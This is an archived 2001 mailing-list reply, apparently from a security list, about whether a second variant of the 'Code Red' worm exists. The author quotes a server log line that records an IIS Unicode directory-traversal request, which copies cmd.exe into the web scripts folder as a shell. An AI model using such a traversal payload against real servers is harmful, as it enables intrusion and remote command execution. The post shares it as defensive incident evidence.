Re: "Code Red" worm - there MUST be at least two versions.

From: Jon-o Addleman (jonathan.addlemanat_private)
Date: Fri Jul 20 2001 - 14:40:06 PDT

Next message: Adam: "Re: "Code Red" worm - there MUST be at least two versions."

Previous message: Tom Perrine: "Re: Two birds with one worm"
In reply to: Don Papp: "Re: "Code Red" worm - there MUST be at least two versions."
Next in thread: Ryan Russell: "Re: "Code Red" worm - there MUST be at least two versions."
Next in thread: Adam: "Re: "Code Red" worm - there MUST be at least two versions."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, Jul 20, 2001 at 12:15:46PM -0600, Don Papp spake thusly:
> 	I wonder if I have seen this variant - a person I emailed has a
> server whose web pages served looks a lot like the Code Red worm's output
> (1 line of simple html) displaying
> 
> 	FUCK CHINA GOVERNENT
> 	and p0isonb0x (or something like that)
> 
> 	On a black background.  The web files themselves are untouched.

I think this was something else - maybe a similar worm, but it used
a different attack:

"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\               
shell.exe" 404 -

The machine that sent that to me had that same web page up, and I
also got one from a different IP (on the same subnet) a few hours
before that. That was a week ago though - July 13... 

-- 
Jon-o Addleman

Next message: Adam: "Re: "Code Red" worm - there MUST be at least two versions."
Previous message: Tom Perrine: "Re: Two birds with one worm"
In reply to: Don Papp: "Re: "Code Red" worm - there MUST be at least two versions."
Next in thread: Ryan Russell: "Re: "Code Red" worm - there MUST be at least two versions."
Next in thread: Adam: "Re: "Code Red" worm - there MUST be at least two versions."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jul 20 2001 - 14:59:50 PDT